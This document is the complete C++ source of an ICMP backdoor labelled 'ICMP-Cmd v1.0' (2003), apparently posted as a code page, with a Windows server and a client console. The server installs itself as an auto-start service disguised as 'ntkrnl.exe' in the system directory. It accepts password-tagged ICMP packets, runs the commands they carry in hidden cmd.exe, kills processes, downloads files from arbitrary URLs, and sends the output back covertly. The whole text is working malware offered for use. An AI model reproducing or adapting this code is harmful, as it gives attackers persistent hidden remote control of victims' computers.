IcmpBackDoor

服务端(Server.cpp):

  1 #include <winsock2.h>
  2 #include <stdio.h>
  3 #include <urlmon.h> 
  4 #include <tlhelp32.h>
  5 #pragma comment(lib, "Urlmon.lib")
  6 #pragma comment(lib, "ws2_32.lib")
  7  
  8 #define ICMP_PASSWORD 1234                                             
  9 #define STATUS_FAILED 0xFFFF
 10 #define MAX_PACKET 6500
 11 #define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
 12  
 13 /* The IP header */
 14 typedef struct iphdr {
 15     unsigned int h_len:4; //4位首部长度
 16     unsigned int version:4; //IP版本号,4表示IPV4
 17     unsigned char tos; //8位服务类型TOS
 18     unsigned short total_len; //16位总长度(字节)
 19     unsigned short ident; //16位标识
 20     unsigned short frag_and_flags; //3位标志位
 21     unsigned char ttl; //8位生存时间 TTL
 22     unsigned char proto; //8位协议 (TCP, UDP 或其他)
 23     unsigned short checksum; //16位IP首部校验和
 24     unsigned int sourceIP; //32位源IP地址
 25     unsigned int destIP; //32位目的IP地址
 26 }IpHeader;
 27  
 28 //定义ICMP首部
 29 typedef struct _ihdr 
 30 {
 31     BYTE i_type; //8位类型
 32     BYTE i_code; //8位代码
 33     USHORT i_cksum; //16位校验和 
 34     USHORT i_id; //识别号(一般用进程号作为识别号)
 35     USHORT i_seq; //报文序列号 
 36     ULONG timestamp; //时间戳
 37 }IcmpHeader;
 38 char arg[256];
 39 char buffer[2048] = {0};//管道输出的数据
 40 void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
 41 void fill_icmp_data(char * icmp_data);
 42 void pslist(void);
 43 BOOL killps(DWORD id);//杀进程函数
 44 void send(void);
 45 char *ICMP_DEST_IP;
 46 USHORT checksum(USHORT *buffer, int size);
 47  
 48 HANDLE                hMutex;
 49 SERVICE_STATUS        ServiceStatus;
 50 SERVICE_STATUS_HANDLE ServiceStatusHandle;
 51 void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *);
 52 void  WINAPI CmdControl(DWORD);
 53 DWORD WINAPI CmdService(LPVOID);
 54 void  InstallCmdService(void);
 55 void  RemoveCmdService(void);
 56 void  usage(char *par);
 57 int main(int argc,char *argv[])
 58 {
 59     SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}};
 60     if(argc==2)
 61     {
 62         if(!stricmp(argv[1],"-install"))
 63         {
 64             //usage(argv[0]);
 65             InstallCmdService();
 66             printf("InstallCmdService\n");
 67         }
 68         else if(!stricmp(argv[1],"-remove"))
 69         {
 70             //usage(argv[0]);
 71             RemoveCmdService();
 72             printf("RemoveCmdService\n");
 73         }
 74         else usage(argv[0]);
 75         return 0;
 76     }
 77     else usage(argv[0]);
 78  
 79  
 80     StartServiceCtrlDispatcher(DispatchTable);
 81     return 0;
 82 }
 83 void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
 84 {
 85     HANDLE    hThread;
 86     ServiceStatus.dwServiceType             = SERVICE_WIN32;
 87     ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
 88     ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
 89     ServiceStatus.dwServiceSpecificExitCode = 0;
 90     ServiceStatus.dwWin32ExitCode           = 0;
 91     ServiceStatus.dwCheckPoint              = 0;
 92     ServiceStatus.dwWaitHint                = 0;
 93     ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl);
 94     if(ServiceStatusHandle==0)
 95     {
 96         OutputDebugString("RegisterServiceCtrlHandler Error !\n");
 97         return ;
 98     }
 99     ServiceStatus.dwCurrentState = SERVICE_RUNNING;
100     ServiceStatus.dwCheckPoint   = 0;
101     ServiceStatus.dwWaitHint     = 0;
102  
103     if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
104     {
105         OutputDebugString("SetServiceStatus in CmdStart Error !\n");
106         return ;
107     }
108     hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
109     if(hThread==NULL)
110     {
111         OutputDebugString("CreateThread in CmdStart Error !\n");
112     }
113     return ;
114 }
115 void WINAPI CmdControl(DWORD dwCode)
116 {
117     switch(dwCode)
118     {
119     case SERVICE_CONTROL_PAUSE:
120         ServiceStatus.dwCurrentState = SERVICE_PAUSED;
121         break;
122     case SERVICE_CONTROL_CONTINUE:
123         ServiceStatus.dwCurrentState = SERVICE_RUNNING;
124         break;
125     case SERVICE_CONTROL_STOP:      
126         WaitForSingleObject(hMutex,INFINITE);
127         ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
128         ServiceStatus.dwWin32ExitCode = 0;
129         ServiceStatus.dwCheckPoint    = 0;
130         ServiceStatus.dwWaitHint      = 0;
131         if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
132         {
133             OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n");
134         }
135         ReleaseMutex(hMutex);
136         CloseHandle(hMutex);
137         return ;
138     case SERVICE_CONTROL_INTERROGATE:
139         break;
140     default:
141         break;
142     }
143     if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
144     {
145         OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n");
146     }
147     return ;
148 }
149 DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数,把你的代码写在这里就可以成为服务
150 {   
151     char *icmp_data;
152     int bread,datasize,retval;
153     SOCKET sockRaw = (SOCKET)NULL;
154     WSADATA wsaData;
155     struct sockaddr_in dest,from;
156     int fromlen = sizeof(from);
157     int timeout = 2000;
158     char *recvbuf;
159  
160     if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
161     {
162         printf("WSAStartup failed: %s\n",retval);
163         ExitProcess(STATUS_FAILED);
164     }
165     sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED);
166     if (sockRaw == INVALID_SOCKET)
167     {
168         printf("WSASocket() failed: %s\n",WSAGetLastError());
169         ExitProcess(STATUS_FAILED);
170     }
171     __try{
172         bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
173         if(bread == SOCKET_ERROR) __leave;
174  
175         memset(&dest,0,sizeof(dest));
176         dest.sin_family = AF_INET;
177         datasize=0;
178         datasize += sizeof(IcmpHeader); 
179         icmp_data =(char*)xmalloc(MAX_PACKET);
180         recvbuf = (char*)xmalloc(MAX_PACKET);
181         if (!icmp_data) {
182             //fprintf(stderr,"HeapAlloc failed %d\n",GetLastError());
183             __leave;
184         }
185         memset(icmp_data,0,MAX_PACKET);
186         for(;;) {
187             int bwrote;
188             bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest));
189             bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen);
190             if (bread == SOCKET_ERROR)
191             {
192                 if (WSAGetLastError() == WSAETIMEDOUT)continue;
193                 __leave;
194             }
195             decode_resp(recvbuf,bread,&from);
196             Sleep(200);
197             memset(recvbuf,0,sizeof(recvbuf));
198         }
199     }
200     __finally {
201         if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
202         WSACleanup();
203     }
204     return 0;
205 }
206  
207  
208 void InstallCmdService(void)
209 {
210     SC_HANDLE        schSCManager;
211     SC_HANDLE        schService;
212     char             lpCurrentPath[MAX_PATH];
213     char             lpImagePath[MAX_PATH];
214     char             *lpHostName;
215     WIN32_FIND_DATA  FileData;
216     HANDLE           hSearch;
217     DWORD            dwErrorCode;
218     SERVICE_STATUS   InstallServiceStatus;
219  
220     GetSystemDirectory(lpImagePath,MAX_PATH);
221     strcat(lpImagePath,"\\ntkrnl.exe");
222     lpHostName=NULL;
223  
224     printf("Transmitting File ... ");
225     hSearch=FindFirstFile(lpImagePath,&FileData);
226     if(hSearch==INVALID_HANDLE_VALUE)
227     {
228         GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
229         if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) 
230         {
231             dwErrorCode=GetLastError();
232             if(dwErrorCode==5)
233             {
234                 printf("Failure ... Access is Denied !\n");         
235             }
236             else
237             {
238                 printf("Failure !\n");
239             }
240             return ;
241         }
242         else
243         {
244             printf("Success !\n");
245         }
246     }
247     else
248     {
249         printf("already Exists !\n");
250         FindClose(hSearch);
251     }
252     schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
253     if(schSCManager==NULL)
254     {
255         printf("Open Service Control Manager Database Failure !\n");
256         return ;
257     }
258     printf("Creating Service .... ");
259     schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS,
260         SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,
261         SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); 
262     if(schService==NULL)
263     {
264         dwErrorCode=GetLastError();
265         if(dwErrorCode!=ERROR_SERVICE_EXISTS)
266         {
267             printf("Failure !\n");
268             CloseServiceHandle(schSCManager);
269             return ;
270         }
271         else
272         {
273             printf("already Exists !\n");
274             schService=OpenService(schSCManager,"ntkrnl",SERVICE_START);
275             if(schService==NULL)
276             {
277                 printf("Opening Service .... Failure !\n");
278                 CloseServiceHandle(schSCManager);
279                 return ;
280             }
281         }
282     }
283     else
284     {
285         printf("Success !\n");
286     }
287     printf("Starting Service .... ");
288     if(StartService(schService,0,NULL)==0)                         
289     {
290         dwErrorCode=GetLastError();
291         if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
292         {
293             printf("already Running !\n");
294             CloseServiceHandle(schSCManager);  
295             CloseServiceHandle(schService);
296             return ;
297         }
298     }
299     else
300     {
301         printf("Pending ... ");
302     }
303     while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)           
304     {
305         if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
306         {
307             Sleep(100);
308         }
309         else
310         {
311             break;
312         }
313     }
314     if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
315     {
316         printf("Failure !\n");                       
317     }
318     else
319     {
320         printf("Success !\n");
321     }
322     CloseServiceHandle(schSCManager);
323     CloseServiceHandle(schService);
324     return ;
325 }
326 void RemoveCmdService(void) 
327 {
328     SC_HANDLE        schSCManager;
329     SC_HANDLE        schService;
330     char             lpImagePath[MAX_PATH];
331     char             *lpHostName;
332     WIN32_FIND_DATA  FileData;
333     SERVICE_STATUS   RemoveServiceStatus;
334     HANDLE           hSearch;
335     DWORD            dwErrorCode;
336  
337     GetSystemDirectory(lpImagePath,MAX_PATH);
338     strcat(lpImagePath,"\\ntkrnl.exe");
339     lpHostName=NULL;
340  
341     schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
342     if(schSCManager==NULL)
343     {
344         printf("Opening SCM ......... ");
345         dwErrorCode=GetLastError();
346         if(dwErrorCode!=5)
347         {
348             printf("Failure !\n"); 
349         }
350         else
351         {
352             printf("Failuer ... Access is Denied !\n");
353         }
354         return ;
355     }
356     schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
357     if(schService==NULL) 
358     {
359         printf("Opening Service ..... ");
360         dwErrorCode=GetLastError();
361         if(dwErrorCode==1060)
362         {
363             printf("no Exists !\n");
364         }
365         else
366         {
367             printf("Failure !\n");
368         }
369         CloseServiceHandle(schSCManager);
370     }
371     else
372     {
373         printf("Stopping Service .... ");
374         if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
375         {
376             if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
377             {
378                 printf("already Stopped !\n"); 
379             }
380             else
381             {
382                 printf("Pending ... ");
383                 if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
384                 {
385                     while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         
386                     {
387                         Sleep(10);
388                         QueryServiceStatus(schService,&RemoveServiceStatus);
389                     }
390                     if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
391                     {
392                         printf("Success !\n");
393                     }
394                     else
395                     {
396                         printf("Failure !\n");
397                     }
398                 }
399                 else
400                 {
401                     printf("Failure !\n");          
402                 }
403             }
404         }
405         else
406         {
407             printf("Query Failure !\n");
408         }
409         printf("Removing Service .... ");     
410         if(DeleteService(schService)==0)
411         {
412             printf("Failure !\n");   
413         }
414         else
415         {
416             printf("Success !\n");
417         }
418     }
419     CloseServiceHandle(schSCManager);        
420     CloseServiceHandle(schService);
421     printf("Removing File ....... ");
422     Sleep(1500);
423     hSearch=FindFirstFile(lpImagePath,&FileData);
424     if(hSearch==INVALID_HANDLE_VALUE)
425     {
426         printf("no Exists !\n");
427     }
428     else
429     {
430         if(DeleteFile(lpImagePath)==0)
431         {
432             printf("Failure !\n");               
433         }
434         else
435         {
436             printf("Success !\n");
437         }
438         FindClose(hSearch);
439     }
440     return ;
441 }
442 void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
443 {
444  
445     IpHeader *iphdr;
446     IcmpHeader *icmphdr;
447     unsigned short iphdrlen;
448     iphdr = (IpHeader *)buf;
449     iphdrlen = iphdr->h_len * 4 ; 
450     icmphdr = (IcmpHeader*)(buf + iphdrlen);
451     if(icmphdr->i_seq==ICMP_PASSWORD)//密码正确则输出数据段
452     {
453         ICMP_DEST_IP=inet_ntoa(from->sin_addr);//取得ICMP包的源地址
454         memcpy(arg,buf+iphdrlen+12,256);
455         if (!memcmp(arg,"pskill",6))
456         {
457             killps(atoi(strstr(arg," ")));
458             memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!"));
459             send();
460         }
461  
462         else if (!memcmp(arg,"pslist",6)){pslist();send();}
463         else if (!strcmp(arg,"remove\n"))
464         {
465             RemoveCmdService();
466             memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
467             send();
468             return;
469         }
470         ////////////************    http下载   *************
471         else if (!memcmp(arg,"http://",7))   
472         {
473             if(char *FileName=strstr(arg,"-"))
474             {
475  
476                 char url[200];//保存网址的数组
477                 memset(url,0,200);
478                 memcpy(url,arg,int(FileName-arg-1));
479                 char fname[MAX_PATH];
480                 GetSystemDirectory(fname,MAX_PATH);
481                 FileName++;
482                 strcat(fname,"//");
483                 strcat(fname,FileName);
484                 *strstr(fname,"\n")=NULL;
485                 HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
486                 memset(buffer,0,sizeof(buffer));
487                 if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n"));
488                 else 
489                     memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n"));
490                 send();
491                 return;
492             }
493         }
494         //*******************************************
495         else{
496             SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
497             HANDLE hRead,hWrite;
498             sa.nLength = sizeof(SECURITY_ATTRIBUTES);
499             sa.lpSecurityDescriptor = NULL;
500             sa.bInheritHandle = TRUE;
501             if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
502             {
503                 printf("Error On CreatePipe()");
504                 return;
505             }
506  
507             STARTUPINFO si;
508             PROCESS_INFORMATION pi; 
509             si.cb = sizeof(STARTUPINFO);
510             GetStartupInfo(&si); 
511             si.hStdError = hWrite;
512             si.hStdOutput = hWrite;
513             si.wShowWindow = SW_HIDE;
514             si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
515             char cmdline[270];
516             GetSystemDirectory(cmdline,MAX_PATH+1);
517             strcat(cmdline,"//cmd.exe /c");
518             strcat(cmdline,arg);
519             if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
520             {
521                 printf("Error on CreateProcess()");
522                 return;
523             }
524             CloseHandle(hWrite);
525  
526  
527             DWORD bytesRead;
528             for(;;){
529                 if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break;
530                 Sleep(200);
531             }
532             //printf("%s",buffer);
533             /////////////////////////////////////////////
534             //发送输出数据
535             send();
536         }
537         ////////////////////////////////////////////////
538  
539     }
540     //else printf("Other ICMP Packets!\n");
541     //printf(endl; 
542 }
543  
544  
545 USHORT checksum(USHORT *buffer, int size) 
546 {
547     unsigned long cksum=0;
548     while(size >1) 
549     {
550         cksum+=*buffer++;
551         size -=sizeof(USHORT);
552     }
553     if(size ) {
554         cksum += *(UCHAR*)buffer;
555     }
556     cksum = (cksum >> 16) + (cksum & 0xffff);
557     cksum += (cksum >>16);
558     return (USHORT)(~cksum);
559 }
560  
561 void fill_icmp_data(char * icmp_data)
562 {
563     IcmpHeader *icmp_hdr;
564     char *datapart;
565     icmp_hdr = (IcmpHeader*)icmp_data;
566     icmp_hdr->i_type = 0;
567     icmp_hdr->i_code = 0;
568     icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
569     icmp_hdr->i_cksum = 0;
570     icmp_hdr->i_seq =4321;
571     icmp_hdr->timestamp = GetTickCount(); //设置时间戳
572     datapart = icmp_data + sizeof(IcmpHeader);
573     memcpy(datapart,buffer,strlen(buffer));
574     //for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 
575 }
576 void  usage(char *par)
577 {
578     printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
579     printf("\n");
580     printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n");
581     printf("\t\t---[ E-mail: gxisone@hotmail.com      ]---\n");
582     printf("\t\t---[                        2003/8/15 ]---\n");
583     printf("\n");
584     printf("\t\tUsage: %s -install (to install service)\n",par);
585     printf("\t\t       %s -remove (to remove service)\n",par);
586     printf("\n");
587     return ;
588  
589 }
590 void send(void)
591 {
592     WSADATA wsaData;
593     SOCKET sockRaw = (SOCKET)NULL;
594     struct sockaddr_in dest;
595     int bread,datasize,retval,bwrote;
596     int timeout = 1000;
597     char *icmp_data;
598     if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED);
599     if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
600         ==INVALID_SOCKET) ExitProcess(STATUS_FAILED);
601     __try
602     {
603         if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
604         //设置发送超时
605         memset(&dest,0,sizeof(dest));
606         dest.sin_family = AF_INET;
607         dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
608         datasize=strlen(buffer);
609         datasize+=sizeof(IcmpHeader); 
610         icmp_data=(char*)xmalloc(MAX_PACKET);
611         if(!icmp_data) __leave;
612         memset(icmp_data,0,MAX_PACKET);
613         fill_icmp_data(icmp_data); //填充ICMP报文
614         ((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //计算校验和
615         bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //发送报文
616         if (bwrote == SOCKET_ERROR)
617         {
618             //if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
619             //printf("sendto failed:"<<WSAGetLastError()<<endl;
620             __leave;
621         }
622         //printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl;
623     }
624  
625     __finally 
626     {
627         if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
628         WSACleanup();
629     }
630     memset(buffer,0,sizeof(buffer));
631     Sleep(200);
632 }
633 void pslist(void)
634 {
635     HANDLE hProcessSnap = NULL;
636     PROCESSENTRY32 pe32= {0};
637     hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
638     if (hProcessSnap == (HANDLE)-1)
639     {
640         printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
641         return ;
642     }
643     pe32.dwSize = sizeof(PROCESSENTRY32);
644     printf("\nProcessName     ProcessID");
645     if (Process32First(hProcessSnap, &pe32))
646     {
647         char a[5];
648         do
649         {
650             strcat(buffer,pe32.szExeFile);
651             strcat(buffer,"\t\t");
652             itoa(pe32.th32ProcessID,a,10);
653             strcat(buffer,a);
654             strcat(buffer,"\n");
655             //printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
656         }
657         while (Process32Next(hProcessSnap, &pe32));
658     }
659     else
660     {
661         printf("\nProcess32Firstt() failed:%d",GetLastError());
662     }
663     CloseHandle (hProcessSnap);
664     return;
665 }
666 BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
667 {
668     TOKEN_PRIVILEGES tp;
669     LUID luid;
670     if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
671     {
672         printf("\nLookupPrivilegeValue error:%d", GetLastError() ); 
673         return FALSE; 
674     }
675     tp.PrivilegeCount = 1;
676     tp.Privileges[0].Luid = luid;
677     if (bEnablePrivilege)
678         tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
679     else
680         tp.Privileges[0].Attributes = 0;
681     // Enable the privilege or disable all privileges.
682     AdjustTokenPrivileges(
683         hToken, 
684         FALSE, 
685         &tp, 
686         sizeof(TOKEN_PRIVILEGES), 
687         (PTOKEN_PRIVILEGES) NULL, 
688         (PDWORD) NULL); 
689     // Call GetLastError to determine whether the function succeeded.
690     if (GetLastError() != ERROR_SUCCESS) 
691     { 
692         printf("AdjustTokenPrivileges failed: %u\n", GetLastError() ); 
693         return FALSE; 
694     } 
695     return TRUE;
696 }
697 ////////////////////////////////////////////////////////////////////////////
698 BOOL killps(DWORD id)//杀进程函数
699 {
700     HANDLE hProcess=NULL,hProcessToken=NULL;
701     BOOL IsKilled=FALSE,bRet=FALSE;
702     __try
703     {
704         if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
705         {
706             printf("\nOpen Current Process Token failed:%d",GetLastError());
707             __leave;
708         }
709         //printf("\nOpen Current Process Token ok!");
710         if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
711         {
712             __leave;
713         }
714         printf("\nSetPrivilege ok!");
715         if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
716         {
717             printf("\nOpen Process %d failed:%d",id,GetLastError());
718             __leave;
719         }
720         //printf("\nOpen Process %d ok!",id);
721         if(!TerminateProcess(hProcess,1))
722         {
723             printf("\nTerminateProcess failed:%d",GetLastError());
724             __leave;
725         }
726         IsKilled=TRUE;
727     }
728     __finally
729     {
730         if(hProcessToken!=NULL) CloseHandle(hProcessToken);
731         if(hProcess!=NULL) CloseHandle(hProcess);
732     }
733     return(IsKilled);
734 }
View Code

客户端(Client.cpp):

  1 #include <winsock2.h>
  2 #include <stdio.h>
  3 #include <stdlib.h>
  4 #pragma comment(lib,"ws2_32.lib")
  5 char SendMsg[256];
  6 /* The IP header */
  7 typedef struct iphdr {
  8     unsigned int h_len:4; //4位首部长度
  9     unsigned int version:4; //IP版本号,4表示IPV4
 10     unsigned char tos; //8位服务类型TOS
 11     unsigned short total_len; //16位总长度(字节)
 12     unsigned short ident; //16位标识
 13     unsigned short frag_and_flags; //3位标志位
 14     unsigned char ttl; //8位生存时间 TTL
 15     unsigned char proto; //8位协议 (TCP, UDP 或其他)
 16     unsigned short checksum; //16位IP首部校验和
 17     unsigned int sourceIP; //32位源IP地址
 18     unsigned int destIP; //32位目的IP地址
 19 }IpHeader;
 20  
 21  
 22 typedef struct _ihdr
 23 {
 24     BYTE i_type;//8位类型
 25     BYTE i_code; //8位代码
 26     USHORT i_cksum;//16位校验和
 27     USHORT i_id;//识别号(一般用进程号作为识别号)
 28     USHORT i_seq;//报文序列号
 29     ULONG timestamp;//时间截
 30 } IcmpHeader;
 31 #define STATUS_FAILED 0xFFFF
 32  
 33 #define MAX_PACKET 2000
 34 char arg[1450];
 35 #define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
 36  
 37 void fill_icmp_data(char *, int);
 38 USHORT checksum(USHORT *, int);
 39 void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数
 40 void help(void);
 41 void usage(char * prog);
 42 int main(int argc, char *argv[])
 43 {
 44     char *ICMP_DEST_IP; //目标主机的IP
 45     char *recvbuf;
 46     if(argc!=2)
 47     {
 48         usage(argv[0]);
 49         return 0;
 50     }
 51     ICMP_DEST_IP=argv[1];//取得目标主机IP
 52     WSADATA wsaData;
 53     SOCKET sockRaw;
 54     struct sockaddr_in dest,from;
 55     int datasize;
 56     int fromlen=sizeof(from);
 57     char *icmp_data;
 58  
 59  
 60     if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
 61     {
 62         fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
 63         ExitProcess(STATUS_FAILED);
 64     }
 65     sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
 66     int timeout=1000;
 67     setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
 68     timeout=4000;
 69     setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
 70     memset(&dest,0,sizeof(dest));
 71     dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
 72     dest.sin_family=AF_INET;
 73     usage(argv[0]);
 74     __try{
 75         for(;;){
 76             printf("ICMP-CMD>");
 77             fgets(SendMsg,1024,stdin);//取得命令行,保存在SendMsg数组中
 78             if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);
 79             if(!strcmp(SendMsg,"\n"))continue;
 80             if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
 81             if(!memcmp(SendMsg,"http://",7))
 82                 if(!strstr(SendMsg,"-")){
 83                     printf("\nFileName Error. Use ");
 84                     continue;
 85                 }
 86                 datasize=strlen(SendMsg);
 87                 datasize+=sizeof(IcmpHeader);
 88                 printf("ICMP packet size is %d",datasize);
 89                 icmp_data= (char*)xmalloc(MAX_PACKET);
 90                 recvbuf= (char *)xmalloc(MAX_PACKET);
 91                 memset(icmp_data,0, MAX_PACKET);
 92                 fill_icmp_data(icmp_data, datasize);
 93                 ((IcmpHeader *)icmp_data)->i_cksum=0;
 94                 ((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
 95                 int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
 96                 if (bwrote == SOCKET_ERROR)
 97                 {
 98                     if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
 99                     fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
100                 }
101                 if (bwrote<datasize ) {//没有把所有的数据发送出去,也出错了。
102                     return 0;
103                 }
104                 printf("\nSend Packet to %s Success!\n",argv[1]);
105                 DWORD start = GetTickCount();
106                 for(;;){
107                     if((GetTickCount() - start) >= 1000) break;
108                     memset(recvbuf,0,MAX_PACKET);
109                     int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
110                     if(bread == SOCKET_ERROR)
111                     {
112                         if(WSAGetLastError() == WSAETIMEDOUT)
113                         {
114                             printf("timed out\n");
115                             break;
116                         }
117                         fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
118                         break;
119                     }
120                     decode_resp(recvbuf, bread, &from);
121                 }
122         }//end for
123     }//end try
124  
125  
126     __finally
127     {
128         if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
129         WSACleanup();
130     }
131     return 0;
132 }
133  
134 USHORT checksum(USHORT *buffer, int size)
135 {
136     unsigned long cksum=0;
137     while(size > 1)
138     {
139         cksum+=*buffer++;
140         size-=sizeof(USHORT);
141     }
142     if(size)
143     {
144         cksum+=*(UCHAR *)buffer;
145     }
146     cksum=(cksum >> 16) + (cksum & 0xffff);
147     cksum+=(cksum >> 16);
148     return(USHORT) (~cksum);
149 }
150 void fill_icmp_data(char *icmp_data, int datasize)
151 {
152     IcmpHeader *icmp_hdr;
153     char *datapart;
154     icmp_hdr= (IcmpHeader *)icmp_data;
155     icmp_hdr->i_type=0;
156     icmp_hdr->i_code=0;
157     icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
158     icmp_hdr->timestamp =GetTickCount();
159     icmp_hdr->i_seq=1234;
160     datapart=icmp_data + sizeof(IcmpHeader);
161     memcpy(datapart,SendMsg,sizeof(SendMsg));
162 }
163 void usage(char * prog)
164 {
165     printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
166     printf("\n");
167     printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n");
168     printf("\t\t---[ E-mail:    gxisone@hotmail.com   ]---\n");
169     printf("\t\t---[                      2003/8/15   ]---\n");
170     printf("\t\tusage: %s RemoteIP\n",prog);
171     printf("\t\tCtrl+C or Q/q to Quite        H/h for help\n");
172 }
173  
174  
175 void decode_resp(char *buf, int bytes,struct sockaddr_in *from) 
176 {
177     memset(arg,0,sizeof(arg));
178     IpHeader *iphdr;
179     IcmpHeader *icmphdr;
180     unsigned short iphdrlen;
181     iphdr = (IpHeader *)buf;
182     iphdrlen = iphdr->h_len * 4 ; 
183     icmphdr = (IcmpHeader*)(buf + iphdrlen);
184     if(icmphdr->i_seq==4321)//密码正确则输出数据段
185     {
186         printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
187         printf(" IcmpType %d",icmphdr->i_type);
188         printf(" IcmpCode %d",icmphdr->i_code);
189         printf("\n");
190         memcpy(arg,buf+iphdrlen+12,1450);
191         printf("%s",arg);
192     }
193     else 
194         printf("Other ICMP Packets!\n");
195 }
